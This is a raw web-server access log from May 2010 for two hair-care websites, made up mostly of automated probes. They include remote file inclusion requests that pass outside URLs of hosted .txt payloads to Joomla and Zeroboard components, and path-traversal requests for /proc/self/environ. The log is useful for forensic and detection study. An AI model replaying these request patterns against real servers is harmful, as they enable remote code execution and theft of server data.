114.108.177.125 - - [31/May/2010:03:11:50 -0700] "GET /logs//index.php?option=com_fabrik&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.174.120.20 - - [31/May/2010:03:12:40 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.37.150.18 - - [31/May/2010:03:12:56 -0700] "GET /logs/access_100412.log//skin/zero_vote//login.php?dir=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.174.120.20 - - [31/May/2010:03:13:05 -0700] "GET /index.php?option=com_fabrik&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.174.120.20 - - [31/May/2010:03:13:05 -0700] "GET /logs/access.log//index.php?option=com_fabrik&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.174.120.20 - - [31/May/2010:03:13:05 -0700] "GET /logs//index.php?option=com_fabrik&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.174.120.20 - - [31/May/2010:03:15:23 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:03:23:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14951 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
66.90.73.48 - - [31/May/2010:03:25:02 -0700] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
114.108.177.125 - - [31/May/2010:03:25:28 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.216.153.186 - - [31/May/2010:03:26:04 -0700] "GET /?_zb_path=http://st4n.fileave.com/id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
112.216.153.186 - - [31/May/2010:03:26:04 -0700] "GET /logs//?_zb_path=http://st4n.fileave.com/id1.txt? HTTP/1.1" 200 5662 "-" "Mozilla/5.0" "growlonghairfast.com"
112.216.153.186 - - [31/May/2010:03:26:04 -0700] "GET /logs/access_100315.log//?_zb_path=http://st4n.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.55.146.140 - - [31/May/2010:03:26:30 -0700] "GET /logs/access_100412.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.55.146.140 - - [31/May/2010:03:26:30 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.55.146.140 - - [31/May/2010:03:26:30 -0700] "GET /logs/access_100412.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.55.146.140 - - [31/May/2010:03:26:30 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.55.146.140 - - [31/May/2010:03:26:30 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.55.146.140 - - [31/May/2010:03:26:30 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
114.108.177.125 - - [31/May/2010:03:26:42 -0700] "GET /logs//index.php?option=com_fabrik&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.177.125 - - [31/May/2010:03:26:42 -0700] "GET /index.php?option=com_fabrik&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.177.125 - - [31/May/2010:03:26:43 -0700] "GET /logs/access.log//index.php?option=com_fabrik&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
76.73.80.242 - - [31/May/2010:03:26:45 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
76.73.80.242 - - [31/May/2010:03:26:45 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:03:27:15 -0700] "GET /logs/access_100412.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:03:27:15 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:03:27:16 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
64.251.10.117 - - [31/May/2010:03:28:00 -0700] "GET /logs/access_100412.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
64.251.10.117 - - [31/May/2010:03:28:01 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
64.251.10.117 - - [31/May/2010:03:28:01 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
64.251.10.117 - - [31/May/2010:03:28:05 -0700] "GET /logs/access_100412.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
64.251.10.117 - - [31/May/2010:03:28:06 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
64.251.10.117 - - [31/May/2010:03:28:06 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
216.7.185.19 - - [31/May/2010:03:28:49 -0700] "GET /logs/access_100412.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.7.185.19 - - [31/May/2010:03:28:49 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.7.185.19 - - [31/May/2010:03:28:50 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.7.185.19 - - [31/May/2010:03:29:24 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.7.185.19 - - [31/May/2010:03:29:24 -0700] "GET /logs/access_100412.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.7.185.19 - - [31/May/2010:03:29:25 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.216.153.186 - - [31/May/2010:03:30:02 -0700] "GET /logs/access_100315.log%20%20//?_zb_path=http://st4n.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [31/May/2010:03:30:47 -0700] "GET /logs/bbs//write_update.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [31/May/2010:03:30:47 -0700] "GET /bbs//write_update.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [31/May/2010:03:30:47 -0700] "GET /logs/access.log/bbs//write_update.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [31/May/2010:03:30:48 -0700] "GET /logs/bbs//write_update.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [31/May/2010:03:30:49 -0700] "GET /logs/access.log/bbs//write_update.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [31/May/2010:03:30:49 -0700] "GET /bbs//write_update.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.44.120.3 - - [31/May/2010:03:32:55 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.44.120.3 - - [31/May/2010:03:32:55 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.44.120.3 - - [31/May/2010:03:32:55 -0700] "GET /logs/access_100412.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.44.120.3 - - [31/May/2010:03:32:55 -0700] "GET /logs/access_100412.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.44.120.3 - - [31/May/2010:03:32:55 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.44.120.3 - - [31/May/2010:03:32:55 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.177.125 - - [31/May/2010:03:33:34 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.177.125 - - [31/May/2010:03:33:34 -0700] "GET /logs/access_100315.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.177.125 - - [31/May/2010:03:33:34 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.177.125 - - [31/May/2010:03:33:43 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.177.125 - - [31/May/2010:03:33:43 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.177.125 - - [31/May/2010:03:33:44 -0700] "GET /logs/access_100315.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.37.176 - - [31/May/2010:03:33:53 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [31/May/2010:03:33:54 -0700] "GET /logs/access_091012.log HTTP/1.0" 200 766310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
212.117.173.251 - - [31/May/2010:03:33:57 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
212.117.173.251 - - [31/May/2010:03:33:58 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
194.54.89.10 - - [31/May/2010:03:35:23 -0700] "GET /logs/access_100412.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
194.54.89.10 - - [31/May/2010:03:35:23 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
194.54.89.10 - - [31/May/2010:03:35:24 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
66.249.65.119 - - [31/May/2010:03:37:48 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
66.90.73.48 - - [31/May/2010:03:37:57 -0700] "GET /logs/access.log//index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
66.90.73.48 - - [31/May/2010:03:37:58 -0700] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
66.90.73.48 - - [31/May/2010:03:37:58 -0700] "GET /logs//index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
209.44.120.3 - - [31/May/2010:03:40:32 -0700] "GET /logs/access_100412.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.44.120.3 - - [31/May/2010:03:40:38 -0700] "GET /logs/access_100412.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.245 - - [31/May/2010:03:41:06 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [31/May/2010:03:41:06 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
192.167.114.31 - - [31/May/2010:03:41:37 -0700] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
207.58.188.125 - - [31/May/2010:03:42:49 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cacador.sc.gov.br/administrator/id.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.811" "growlonghairfast.com"
207.58.188.125 - - [31/May/2010:03:42:49 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cacador.sc.gov.br/administrator/id.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.811" "growlonghairfast.com"
207.58.188.125 - - [31/May/2010:03:42:49 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cacador.sc.gov.br/administrator/id.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.811" "growlonghairfast.com"
192.220.118.1 - - [31/May/2010:03:43:41 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
192.220.118.1 - - [31/May/2010:03:43:42 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
192.220.118.1 - - [31/May/2010:03:43:42 -0700] "GET /logs/access_100412.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
192.167.114.31 - - [31/May/2010:03:46:05 -0700] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
192.167.114.31 - - [31/May/2010:03:46:06 -0700] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
77.88.25.28 - - [31/May/2010:03:47:09 -0700] "GET /freehairsecretsphp/viewtopic.php?p=1696 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
192.167.114.31 - - [31/May/2010:03:48:59 -0700] "GET /logs/access_100201.log/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
192.167.114.31 - - [31/May/2010:03:48:59 -0700] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
192.167.114.31 - - [31/May/2010:03:49:00 -0700] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
76.73.80.242 - - [31/May/2010:03:50:42 -0700] "GET /logs/access_100412.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
76.73.80.242 - - [31/May/2010:03:50:42 -0700] "GET /logs/access_100412.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
76.73.80.242 - - [31/May/2010:03:50:42 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
76.73.80.242 - - [31/May/2010:03:50:42 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
76.73.80.242 - - [31/May/2010:03:50:42 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
76.73.80.242 - - [31/May/2010:03:50:42 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
192.220.118.1 - - [31/May/2010:03:54:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
192.220.118.1 - - [31/May/2010:03:54:51 -0700] "GET /logs/access_100412.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
192.220.118.1 - - [31/May/2010:03:54:51 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.14.66 - - [31/May/2010:03:55:27 -0700] "GET /logs/access_100405.log%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.14.66 - - [31/May/2010:03:55:27 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.14.66 - - [31/May/2010:03:55:27 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
192.220.118.1 - - [31/May/2010:03:57:26 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
192.220.118.1 - - [31/May/2010:03:57:27 -0700] "GET /logs/access_100412.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
192.220.118.1 - - [31/May/2010:03:57:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:03:58:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8267 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
192.220.118.1 - - [31/May/2010:03:58:40 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
192.220.118.1 - - [31/May/2010:03:58:40 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
192.220.118.1 - - [31/May/2010:03:58:40 -0700] "GET /logs/access_100412.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.54.89.10 - - [31/May/2010:04:00:15 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.44.120.3 - - [31/May/2010:04:02:06 -0700] "GET /delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.44.120.3 - - [31/May/2010:04:02:06 -0700] "GET /logs/access_100125.log//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.44.120.3 - - [31/May/2010:04:02:07 -0700] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:03:33 -0700] "GET /logs//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:03:33 -0700] "GET /administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:03:33 -0700] "GET /logs/access_100412.log%20%20//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [31/May/2010:04:04:01 -0700] "GET /logs//administrator/images/delete.png?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
